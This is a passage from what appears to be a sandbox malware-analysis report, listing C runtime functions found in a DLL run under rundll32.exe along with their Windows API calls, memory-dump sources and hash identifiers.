                        • Opcode Fuzzy Hash: 32312b6ac974a9b827706e6abb0bf2f5cf3c7612579a5912d1e8c4a488532e74
                        • Instruction Fuzzy Hash: 3211A372A45660AFDB624B6DAC45B8D37A9EF037B0F110231E931EB2C8D760FD1186E1
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6FB9A28B,?,?,6FB9A253,?,00000001,?), ref: 6FB9A2EE
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6FB9A301
                        • FreeLibrary.KERNEL32(00000000,?,?,6FB9A28B,?,?,6FB9A253,?,00000001,?), ref: 6FB9A324
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 98e092a6a7c2637ef652b92bdf0b24403684cf1b4dd11ab1c697e2805ced2a76
                        • Instruction ID: a046e6a4ab94f90d68aa08fc5c8119c72ac33cd3c2b0e56f0f67b976eb5bf318
                        • Opcode Fuzzy Hash: 98e092a6a7c2637ef652b92bdf0b24403684cf1b4dd11ab1c697e2805ced2a76
                        • Instruction Fuzzy Hash: ACF0A070909558FBDF119B66DC0EBDD7E7BEB03366F108064F801A2150CB328E21DB90
                        APIs
                        • _free.LIBCMT ref: 6FB9E346
                          • Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
                          • Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937
                        • _free.LIBCMT ref: 6FB9E358
                        • _free.LIBCMT ref: 6FB9E36A
                        • _free.LIBCMT ref: 6FB9E37C
                        • _free.LIBCMT ref: 6FB9E38E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 5562b6a5582b9522d4276496308efb9f399e1371f18efa8cb86aca239ce8f5aa
                        • Instruction ID: 0b4d3766e88d674f92f2b8bff2effd2a8a5f883efe4cfdfec2d5ee91236ba4d4
                        • Opcode Fuzzy Hash: 5562b6a5582b9522d4276496308efb9f399e1371f18efa8cb86aca239ce8f5aa
                        • Instruction Fuzzy Hash: 16F030315187889BCE11DE6AF8C2D5F77E9FA037247646C2AF018D7580CB30FA918AB4
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: _free
                        • String ID: *?
                        • API String ID: 269201875-2564092906
                        • Opcode ID: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
                        • Instruction ID: 171e588cdf66521419a08a4657380859c95746a460fcb5df273b19b0efcf0d2b
                        • Opcode Fuzzy Hash: 19c18ddf14ce9615cfa6117e23dcf04fce62630a8d918e35b75d869d6a8ef9cd
                        • Instruction Fuzzy Hash: 42614AB5E002599FDB14CFA8D8805EDFBF5FF4A314B25816AD814EB344EB31AE418B90
                        APIs
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 5b7d3a9bf22847d0ad2ad2a661fcbff901645e30392858e00d86780f22be0c52
                        • Instruction ID: 96cc940a13c2bbdd852c1e3ce5fa6a99b5dd6529e54fcb1b7942fd3116800663
                        • Opcode Fuzzy Hash: 5b7d3a9bf22847d0ad2ad2a661fcbff901645e30392858e00d86780f22be0c52
                        • Instruction Fuzzy Hash: 7451D076608796AFEB198F14F880BAE77A5EF0A314F60413ED91297290D731E881C790
                        APIs
                          • Part of subcall function 6FB9C035: _free.LIBCMT ref: 6FB9C043
                          • Part of subcall function 6FB9CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6FB9D927,6FB9FBE4,0000FDE9,00000000,?,?,?,6FB9F95D,0000FDE9,00000000,?), ref: 6FB9CCB5
                        • GetLastError.KERNEL32 ref: 6FB9BA7B
                        • __dosmaperr.LIBCMT ref: 6FB9BA82
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6FB9BAC1
                        • __dosmaperr.LIBCMT ref: 6FB9BAC8
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                        • String ID:
                        • API String ID: 167067550-0
                        • Opcode ID: 712e3d9aa41d8f6a29c99ca8f024496594ff6b8d65558bf4bd51160090fa831c
                        • Instruction ID: 980633a3f3e216fb0ca1a7a781b83ad370691920b57c1de8b5713d4d495ea764
                        • Opcode Fuzzy Hash: 712e3d9aa41d8f6a29c99ca8f024496594ff6b8d65558bf4bd51160090fa831c
                        • Instruction Fuzzy Hash: E221B3B160438AAF9B109F65AC80D5FB7ADEF47368711C538F82897190EB30FE5187A0
                        APIs
                        • GetLastError.KERNEL32(?,?,?,6FB9F6A4,?,00000001,6FB9D998,?,6FB9FB5E,00000001,?,?,?,6FB9D927,?,00000000), ref: 6FB9B2D1
                        • _free.LIBCMT ref: 6FB9B32E
                        • _free.LIBCMT ref: 6FB9B364
                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6FB9FB5E,00000001,?,?,?,6FB9D927,?,00000000,00000000,6FBACB38,0000002C,6FB9D998), ref: 6FB9B36F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ErrorLast_free
                        • String ID:
                        • API String ID: 2283115069-0
                        • Opcode ID: 93fdbc97768b82ec4262bbc7d15aaddcddc30d79f24c2da1231e69310b019f7e
                        • Instruction ID: aed76908e89de28f06756d66e2b579f0e4715d7e06c9436c5dbedbadcfd83c51
                        • Opcode Fuzzy Hash: 93fdbc97768b82ec4262bbc7d15aaddcddc30d79f24c2da1231e69310b019f7e
                        • Instruction Fuzzy Hash: 341148726087C1ABDB20667BBC92F5F356AEBC7778B244238F134971C1DF619A224220
                        APIs
                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001), ref: 6FBA067D
                        • GetLastError.KERNEL32(?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001,?,00000001,?,6FB9FB7F,6FB9D927), ref: 6FBA0689
                          • Part of subcall function 6FBA064F: CloseHandle.KERNEL32(FFFFFFFE,6FBA0699,?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001,?,00000001), ref: 6FBA065F
                        • ___initconout.LIBCMT ref: 6FBA0699
                          • Part of subcall function 6FBA0611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6FBA0640,6FBA00B7,00000001,?,6FB9F633,?,?,00000001,?), ref: 6FBA0624
                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6FBA00CA,?,00000001,?,00000001,?,6FB9F633,?,?,00000001,?), ref: 6FBA06AE
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                        • String ID:
                        • API String ID: 2744216297-0
                        • Opcode ID: 2ecf2960ab94bcb2f493150d259cbc04d379d5971aff36186bf529661f3639b3
                        • Instruction ID: cc6adc7f6948a91d5b720e37c93265a23e536db5d2c799729519dbd697245584
                        • Opcode Fuzzy Hash: 2ecf2960ab94bcb2f493150d259cbc04d379d5971aff36186bf529661f3639b3
                        • Instruction Fuzzy Hash: 1CF01C76004668BBCF226FDADC0598E3F66FF4A3B4F045010FA1987160C6328871EBA1
                        APIs
                        • _free.LIBCMT ref: 6FB9AC58
                          • Part of subcall function 6FB9B90F: HeapFree.KERNEL32(00000000,00000000,?,6FB9AB0E), ref: 6FB9B925
                          • Part of subcall function 6FB9B90F: GetLastError.KERNEL32(?,?,6FB9AB0E), ref: 6FB9B937
                        • _free.LIBCMT ref: 6FB9AC6B
                        • _free.LIBCMT ref: 6FB9AC7C
                        • _free.LIBCMT ref: 6FB9AC8D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 331cd99bae050e5d1a2b074c598eedc7ac9ec2c3c3b23f56f392d8fb01e30d38
                        • Instruction ID: 40a4e831ac79613252e1308c4a77ec62ad99b7c5b653ff6e26795711f6bddf83
                        • Opcode Fuzzy Hash: 331cd99bae050e5d1a2b074c598eedc7ac9ec2c3c3b23f56f392d8fb01e30d38
                        • Instruction Fuzzy Hash: DEE0B671920E65AE8F426F17E8825CE3B31EB476347419026E8A857664D73207739FC9
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID:
                        • String ID: C:\Windows\SysWOW64\rundll32.exe
                        • API String ID: 0-2837366778
                        • Opcode ID: d315d231748c6facc89031d7fbab211c0885625ba76f951f3abf95b15a3ef532
                        • Instruction ID: 9c62c2a8217ad7145d0f46f51a7b5111eb863c3bbef1629868dd4dbaf02d7ca5
                        • Opcode Fuzzy Hash: d315d231748c6facc89031d7fbab211c0885625ba76f951f3abf95b15a3ef532
                        • Instruction Fuzzy Hash: B7416BB1E04695AFDB128F99ECC59DEBBBCEB87710F10407AE41497350E770AA51CB90
                        APIs
                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6FB9868F
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4531151913.000000006FB91000.00000020.00000001.01000000.00000003.sdmp, Offset: 6FB90000, based on PE: true
                        • Associated: 00000007.00000002.4531138238.000000006FB90000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531173761.000000006FBA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531187043.000000006FBAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000007.00000002.4531200606.000000006FBB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_6fb90000_rundll32.jbxd
                        Similarity
                        • API ID: EncodePointer
                        • String ID: MOC$RCC
                        • API String ID: 2118026453-2084237596
                        • Opcode ID: 731b48a1c1b0b837b70879c965166b30cf88b7eb7e979853c4641f148a95c84e
                        • Instruction ID: 1023b07eaccfda3fa9c77acd85f8fc038bcfbce0ee8c021d92eb7666b6fde272
                        • Opcode Fuzzy Hash: 731b48a1c1b0b837b70879c965166b30cf88b7eb7e979853c4641f148a95c84e
                        • Instruction Fuzzy Hash: 8A416C72904249AFCF06CF94EC80AEEBBB5FF4A304F144169FA14AB251D335E951DB90